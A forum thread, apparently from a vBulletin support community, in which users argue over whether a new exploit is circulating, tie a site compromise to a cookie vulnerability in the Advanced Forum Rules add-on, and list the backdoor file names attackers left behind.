Please dont go around posting FUD. If you do not have a link to an exploit report, chances are there isn't one in the wild.

Check it out and confirm.

*you need to sign up to view their forums*

I am not spreading spam. But the vb team needs to verify this. This is the latest exploit that is going around. Take a look at the date on this thread & post. It is very recent...like I said, I am no hacker or exploiter nor have i tested it out. But it is something to take a look at...I think there is some credibility to this one.

http://www.hackforums.net/showthread.php?tid=1303176&page=11

http://www.hackforums.net/showthread.php?tid=1230802&page=2

This thread is actually about the recent exploit from the AFR mod. If you have general vb exploits, I suggest to send a PM to an administrator.

Yea sorry. I did.

FUD is not spam, FUD is fear uncertainty and doubt.

Please send the full exploit information to sales@vbulletin.com

This thread is actually about the recent exploit from the AFR mod.

So its not any new exploit as such.

How do you go about tracking down the add-on that was the problem? I got rehacked tonight by Team Adimus and had also upgraded my advanced forum rules mod earlier this month after the first time.

AFR was updated again a few days ago, did you install that ?

No it wasn't...I realized that after posting here and back tracking to find the cause..found snoopytas post about the cookie vulernability. Its updated now though. Hopefully this time I can put this behind me...

--------------- Added 1306166227 at 1306166227 ---------------

Also found that they not only added vba.php to the includes folder, they also added it to includes/xml/includes as well as a file called include_bbs.php to both of those directories as well.